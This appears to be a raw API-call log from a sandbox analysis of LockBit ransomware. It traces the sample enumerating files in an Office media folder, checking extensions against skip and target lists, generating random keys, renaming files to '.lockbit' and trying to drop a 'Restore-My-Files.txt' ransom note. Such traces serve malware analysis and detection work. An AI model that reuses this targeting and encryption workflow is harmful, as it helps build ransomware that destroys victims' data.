lstrcmpiW (lpString1="..", lpString2="BD14752_.GIF") returned -1 [0203.332] PathFindExtensionW (pszPath="BD14752_.GIF") returned=".GIF" [0203.332] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.332] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.332] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.332] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.332] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.332] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.332] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.332] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.332] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.332] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.332] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.332] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.332] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.332] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.332] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.332] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.332] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.332] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.332] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.332] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.333] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.333] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.333] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.333] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.333] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.333] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14752_.GIF") returned 1 [0203.333] lstrcmpiW (lpString1="ntldr", lpString2="BD14752_.GIF") returned 1 [0203.333] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14752_.GIF") returned 1 [0203.333] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14752_.GIF") returned 1 [0203.333] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14752_.GIF") returned -1 [0203.333] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14752_.GIF") returned 1 [0203.333] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14752_.GIF") returned 1 [0203.333] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.334] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14752_.GIF") returned=".GIF" [0203.334] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.334] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.334] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.334] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.334] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.334] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.334] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.334] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.334] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.334] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.334] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.334] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.334] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.334] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.334] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.334] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.334] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.334] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.334] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.334] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.334] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.334] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.334] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.334] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.334] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.334] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.334] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.334] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.334] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14752_.GIF.lockbit") returned 78 [0203.334] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14752_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14752_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.336] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.336] malloc (_Size=0x40068) returned 0x3df0008 [0203.336] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=667) returned 1 [0203.337] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.337] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.337] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.337] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.337] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.340] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14752_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14752_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.340] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.340] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.340] free (_Block=0x1fa2ed8) [0203.340] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14752_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.341] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.341] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.341] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecac8100, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc99e5c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xecac8100, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xbc, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14753_.GIF", cAlternateFileName="")) returned 1 [0203.341] lstrcmpiW (lpString1=".", lpString2="BD14753_.GIF") returned -1 [0203.341] lstrcmpiW (lpString1="..", lpString2="BD14753_.GIF") returned -1 [0203.341] PathFindExtensionW (pszPath="BD14753_.GIF") returned=".GIF" [0203.341] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.341] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.341] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.341] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.341] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.341] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.341] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.341] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.341] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.341] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.341] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.341] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.341] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.341] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.341] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.341] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.341] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.341] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.341] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.341] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.341] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.341] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.341] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.341] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.341] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.341] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.341] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.342] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.342] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.342] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14753_.GIF") returned 1 [0203.342] lstrcmpiW (lpString1="ntldr", lpString2="BD14753_.GIF") returned 1 [0203.342] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14753_.GIF") returned 1 [0203.342] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14753_.GIF") returned 1 [0203.342] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14753_.GIF") returned -1 [0203.342] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14753_.GIF") returned 1 [0203.342] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14753_.GIF") returned 1 [0203.342] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.342] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14753_.GIF") returned=".GIF" [0203.342] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.342] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.342] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.342] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.342] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.342] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.343] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.343] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.343] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.343] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.343] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.343] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.343] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.343] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.343] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.343] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.343] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.343] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.343] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.343] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.343] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.343] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.343] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.343] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.343] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.343] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.343] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.343] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14753_.GIF.lockbit") returned 78 [0203.343] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14753_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14753_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.344] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.344] malloc (_Size=0x40068) returned 0x3df0008 [0203.344] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=188) returned 1 [0203.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.345] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.345] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.345] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.345] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.348] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14753_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14753_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.348] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.348] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.348] free (_Block=0x1fa2ed8) [0203.348] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14753_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.348] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.348] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.349] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecac8100, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc99e5c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xecac8100, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14754_.GIF", cAlternateFileName="")) returned 1 [0203.349] lstrcmpiW (lpString1=".", lpString2="BD14754_.GIF") returned -1 [0203.349] lstrcmpiW (lpString1="..", lpString2="BD14754_.GIF") returned -1 [0203.349] PathFindExtensionW (pszPath="BD14754_.GIF") returned=".GIF" [0203.349] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.349] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.349] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.349] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.349] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.349] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.349] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.349] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.349] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.349] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.349] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.349] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.349] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.349] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.349] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.349] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.349] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.349] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.349] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.349] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.349] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.349] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.349] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.349] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.349] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.349] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.349] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.349] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.349] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.349] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.350] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14754_.GIF") returned 1 [0203.350] lstrcmpiW (lpString1="ntldr", lpString2="BD14754_.GIF") returned 1 [0203.350] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14754_.GIF") returned 1 [0203.350] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14754_.GIF") returned 1 [0203.350] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14754_.GIF") returned -1 [0203.350] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14754_.GIF") returned 1 [0203.350] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14754_.GIF") returned 1 [0203.350] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.350] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14754_.GIF") returned=".GIF" [0203.350] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.350] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.350] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.350] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.350] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.350] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.350] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.350] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.350] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.351] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.351] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.351] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.351] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.351] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.351] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.351] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.351] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.351] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.351] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.351] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.351] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.351] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 